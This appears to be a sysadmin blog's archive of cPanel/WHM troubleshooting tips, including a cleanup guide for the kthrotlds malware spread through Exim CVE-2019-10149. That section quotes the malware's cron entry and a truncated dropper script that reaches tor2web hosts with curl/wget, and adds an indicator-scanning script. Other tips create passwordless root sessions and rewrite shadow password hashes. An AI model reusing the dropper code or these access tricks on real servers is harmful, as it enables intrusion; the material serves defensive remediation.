whmapi1 sethostname hostname=new_hostname
Tag Archives: cPanel
sender verify fail for The mail server could not deliver mail to The account or domain may not exist, they may be blacklisted, or missing the proper dns entries.
cPanel whitelist sender
WHM >> Service Configuration >> Exim Configuration Manager
Sender verification bypass IP addresses
Trusted SMTP IP addresses
cPanel change email password command line
Change info password
pass=$(python3 -c 'import crypt; print(crypt.crypt("mynewpassword", crypt.mksalt(crypt.METHOD_SHA512)))') ; sed -i -e "s,^info:[^:]\+:,info:$pass:," /home/cpanel_username/etc/yourdomain.com/shadow
whm login without password
whmapi1 create_user_session user=root service=whostmgrd
die [Internal Death while parsing ./webmail/paper_lantern/index.html 2429281] Template::Exception:
[TYPE]=[file]
[INFO]=[mail_clients/mail_clients.tt: not found]
[TEXT]=[]
at cpanel.pl line 1126.
cpanel::cpanel::cptt_exectag("/usr/local/cpanel/base/webmail/paper_lantern/index.auto.tmpl", 1) called at cpanel.pl line 4606
cpanel::cpanel::run_standard_mode() called at cpanel.pl line 930
cpanel::cpanel::script("cpanel::cpanel", "-webmail", "./webmail/paper_lantern/index.html") called at cpanel.pl line 32
info [webmaild] show_template.stor lacked output with exit code: 127 at /usr/local/cpanel/Cpanel/Server.pm line 1381.
Cpanel::Server::process_login_template(Cpanel::Server=HASH(0x29ce220), __CPANEL_HIDDEN__, __CPANEL_HIDDEN__, 1, __CPANEL_HIDDEN__, undef, __CPANEL_HIDDEN__, 1, ...) called at /usr/local/cpanel/Cpanel/Server.pm line 2085
Cpanel::Server::process_and_send_login_template(Cpanel::Server=HASH(0x29ce220), "login", "HTTP/1.1 200 OK\x{d}\x{a}Set-Cookie: webmailrelogin=no; HttpOnly; exp"..., HASH(0x2cb1658)) called at /usr/local/cpanel/Cpanel/Server.pm line 926
Cpanel::Server::badpass(Cpanel::Server=HASH(0x29ce220), __CPANEL_HIDDEN__, 1, __CPANEL_HIDDEN__, 1) called at cpsrvd.pl line 5402
cpanel::cpsrvd::handle_auth() called at cpsrvd.pl line 1332
cpanel::cpsrvd::handle_one_connection(11) called at cpsrvd.pl line 1114
cpanel::cpsrvd::script() called at cpsrvd.pl line 434
Failed to show template “login” in login theme “cpanel” (); falling back to legacy login. at /usr/local/cpanel/Cpanel/Server.pm line 2089.
Solution could be:
cd /usr/local/cpanel/base/frontend
mv -v paper_lantern paper_lantern_backup
/usr/local/cpanel/scripts/upcp --force
License User Limit Exceeded cPanel
License User Limit Exceeded
6 users exist on this server, but the current license allows only 5 users.
Because of this excess, this server has locked all cPanel users out of their accounts.
You need to upgrade your cPanel/WHM license and then run:
/usr/local/cpanel/cpkeyclt
Cannot Read License File
cPanel/WHM fix the license:
/usr/local/cpanel/cpkeyclt
Updating cPanel license...Done. Update succeeded.
cPanel imunify antivirus
yum install imunify-antivirus-cpanel
/opt/alt/php73/usr/bin/php -n -d short_open_tag=on -d extension=json.so -d extension=mbstring.so -d extension=leveldb.so /opt/ai-bolit/ai-bolit-hoster.php --smart --deobfuscate --avdb /var/imunify360/files/sigs/v1/aibolit/ai-bolit-hoster.db --no-html --json_report . --json-stdout --memory 2048M --listing /var/imunify360/tmp/tmpopv7tg06 --progress /var/imunify360/tmp/ai_bolit_progress_15820124375361592.json --with-suspicious --size 1048576 --cloud-assist IMUNIFYAV --cloudscan-size 10485760
cPanel exim log more information
Exim Configuration Manager -> Advanced Editor
log_selector:
+incoming_port +smtp_connection +all_parents +retry_defer +subject +arguments +received_recipients +address_rewrite +arguments +connection_reject +delay_delivery +delivery_size +dnslist_defer +incoming_interface +lost_incoming_connection +queue_run +received_sender +sender_on_delivery +size_reject +skip_delivery +smtp_confirmation +smtp_protocol_error +smtp_syntax_error +tls_cipher +tls_peerdn
Invalid command ‘SetEnv’ cPanel
yum install ea-apache24-mod_env
.htaccess: Invalid command ‘SetEnv’, perhaps misspelled or defined by a module not included in the server configuration, referer:
cPanel disable ForcePassiveIP
rm -rvf /var/cpanel/conf/pureftpd/main.cache
vim /var/cpanel/conf/pureftpd/main
Comment out or remove ForcePassiveIP
FTP error usually looks like this:
The data connection cannot be established: ECONNREFUSED – Connection refused by the server.
pure-ftpd[]: (?@?) [DEBUG] Couldn’t load the DH parameters file /etc/ssl/private/pure-ftpd-dhparams.pem
openssl dhparam -out /etc/ssl/private/pure-ftpd-dhparams.pem 3072
Generating DH parameters, 3072 bit long safe prime, generator 2
This is going to take a long time
/scripts/restartsrv_pureftpd
service pure-ftpd status
systemd[1]: Started Pure-FTPd.
kthrotlds CVE-2019-10149 Exim/cPanel
If you find a strangely named process like [kthrotlds] running on your server, it means your server could be affected by the CVE-2019-10149 Exim security exploit. The process name can be different. First of all, you need to kill it:
pkill -9 -f kthrotlds
ps aux | grep kthrotlds # To check if process still exists
Its binary file is created in the /usr/bin/ directory:
/usr/bin/[kthrotlds]
ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
You need to quarantine it or just remove it.
You can find a TCP connection on this process, so it is not a kernel process, as it pretends to be in your process list.
While fixing this issue, my advice is to stop the crond service: service crond stop
Then you should find all files which could be affected:
grep -r passwd /var/spool/cron*
*/11 * * * * root tbin=$(command -v passwd); bpath=$(dirname “${tbin}”); curl=”curl”; if [ $(curl –version 2>/dev/null|grep “curl “|wc -l) -eq 0 ]; then curl=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “CURLOPT_VERBOSE” && curl=”$f” && break; done; fi; fi; wget=”wget”; if [ $(wget –version 2>/dev/null|grep “wgetrc “|wc -l) -eq 0 ]; then wget=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “to
You need to check /etc, /root, /usr/local/bin for bash/sh scripts with malware code, like:
#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
RHOST=”https://an7kmd2wp4xo7hpr”
TOR1=”.tor2web.su/”
TOR2=”.tor2web.io/”
TOR3=”.onion.sh/”
RPATH1=’src/ldm’
#LPATH=”${HOME-/tmp}/.cache/”
TIMEOUT=”75″
CTIMEOUT=”22″
COPTS=” -fsSLk –retry 2 –connect-timeout ${CTIMEOUT} –max-time ${TIMEOUT} ”
WOPTS=” –quiet –tries=2 –wait=5 –no-check-certificate –connect-timeout=${CTIMEOUT} –timeout=${TIMEOUT} ”
tbin=$(command -v passwd); bpath=$(dirname “${tbin}”)
curl=”curl”; if [ $(curl –version 2>/dev/null|grep “curl “|wc -l) -eq 0 ]; then curl=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “CURLOPT_VERBOSE” && curl=”$f” && break; done; fi; fi
wget=”wget”; if [ $(wget –version 2>/dev/null|grep “wgetrc “|wc -l) -eq 0 ]; then wget=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “.wgetrc’-style command” && wget=”$f” && break; done; fi; fi
#CHKCURL=’curl=”curl “; wget=”wget “; if [ “$(whoami)” = “root” ]; then if [ $(command -v curl|wc -l) -eq 0 ]; then curl=$(ls /usr/bin|grep -i url|head -n 1); fi; if [ -z ${curl} ]; then curl=”echo “; fi; if [ $(command -v wget|wc -l) -eq 0 ]; then wget=$(ls /usr/bin|grep -i wget|head -n 1); fi; if [ -z ${wget} ]; then wget=”echo “; fi; if [ $(cat /etc/hosts|grep -i “.onion.”|wc -l) -ne 0 ]; then echo “127.0.0.1 localhost” > /etc/hosts >/dev/null 2>&1; fi; fi; ‘
CHKCURL=’tbin=$(command -v passwd); bpath=$(dirname “${tbin}”); curl=”curl”; if [ $(curl –version 2>/dev/null|grep “curl “|wc -l) -eq 0 ]; then curl=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “CURLOPT_VERBOSE” && curl=”$f” && break; done; fi; fi; wget=”wget”; if [ $(wget –version 2>/dev/null|grep “wgetrc “|wc -l) -eq 0 ]; then wget=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “to
LBIN8=”kthrotlds”
null=’ >/dev/null 2>&1′
If it is a cPanel server, you need to check the Exim version like this:
whmapi1 installed_versions packages=1|grep exim
exim: 4.91-4
– exim-4.91-4.cp1170.x86_64
or simply exim --version
Exim version 4.91 #1 built 06-Jun-2019 12:52:02
To patch WHM and Exim if you have an older version like v76 or v70, first check your WHM version:
whmapi1 installed_versions packages=1|grep whm
cpanel_and_whm: 11.78.0.27
It means 78.0.27
or
cpanel_and_whm: 11.80.0.14
It means 80.0.14
vi /etc/cpupdate.conf
CPANEL=11.76
RPMUP=daily
SARULESUP=daily
STAGING_DIR=/usr/local/cpanel
UPDATES=daily
Then:
/scripts/upcp
Then change it back:
vi /etc/cpupdate.conf
CPANEL=release
RPMUP=daily
SARULESUP=daily
STAGING_DIR=/usr/local/cpanel
UPDATES=daily
P.S. You also need to check /root/.ssh/authorized_keys, /etc/cron.d, /etc/cron.daily, /etc/cron.weekly, /etc/cron.monthly, etc.
You can list all files modified during the last 5 days:
find /etc/ -mtime -5 -print
This malware script removes all your previous cron tasks, so you need to restore them from your backups and then enable the cron service again.
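The checks from this section collected into one script, added here as an example and not part of the original post: scan_persistence greps the cron spool, /etc, /root and /usr/local/bin for strings that appear in the samples above, and find_fake_kthreads reports processes whose own command line starts with "[". The function names, the indicator list and the --live switch are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original post): sweep for the indicators
# quoted in the samples above. ROOT and PROC are parameters so the checks
# can run against a mounted disk image or a constructed test tree.

# Strings that appear in the cron entry and dropper script shown above.
IOC_PATTERN='kthrotlds|tor2web|\.onion\.|CURLOPT_VERBOSE'

# Print files under the locations the post tells you to check that contain
# one of the indicator strings.
scan_persistence() {
    root=${1:-/}
    for rel in var/spool/cron etc root usr/local/bin; do
        path="${root%/}/$rel"
        [ -e "$path" ] || continue
        grep -rlE -- "$IOC_PATTERN" "$path" 2>/dev/null || true
    done
}

# Real kernel threads have an empty /proc/PID/cmdline; ps adds the square
# brackets itself. A process whose own command line starts with "[" is a
# userland program imitating one, as [kthrotlds] does in the process list.
find_fake_kthreads() {
    proc=${1:-/proc}
    for dir in "$proc"/[0-9]*; do
        [ -r "$dir/cmdline" ] || continue
        cmd=$(tr '\000' ' ' < "$dir/cmdline" 2>/dev/null) || continue
        cmd=${cmd% }
        case $cmd in
            "["*) echo "${dir##*/} $cmd" ;;
        esac
    done
}

# Run against the live system only when asked to.
if [ "${1:-}" = "--live" ]; then
    scan_persistence /
    find_fake_kthreads /proc
fi
```

Every hit still needs manual review, and /root/.ssh/authorized_keys has to be read by hand because an added key carries none of these strings.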
Webmail Internal Server Error 500 No response from subprocess (php) cPanel
Internal Server Error 500 No response from subprocess (php): The subprocess reported error number 72,057,594,037,927,935 when it ended. The process dumped a core file
Internal Server Error: “POST /cpsess8893829692/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1” 500 No response from subprocess (php): The subprocess reported error number 72,057,594,037,927,935 when it ended. The process dumped a core file.
Failed to write form data to subprocess: Broken pipe at /usr/local/cpanel/Cpanel/Server/Handlers/SubProcess.pm line 296.
rpm -ql cpanel-php72 | grep php-cgi
/usr/local/cpanel/3rdparty/php/72/bin/php-cgi
If this file is missing, you can try reinstalling the package or downloading it from another server:
yum reinstall cpanel-php72
cpanel create backup
cpanel backup account command line
/scripts/pkgacct username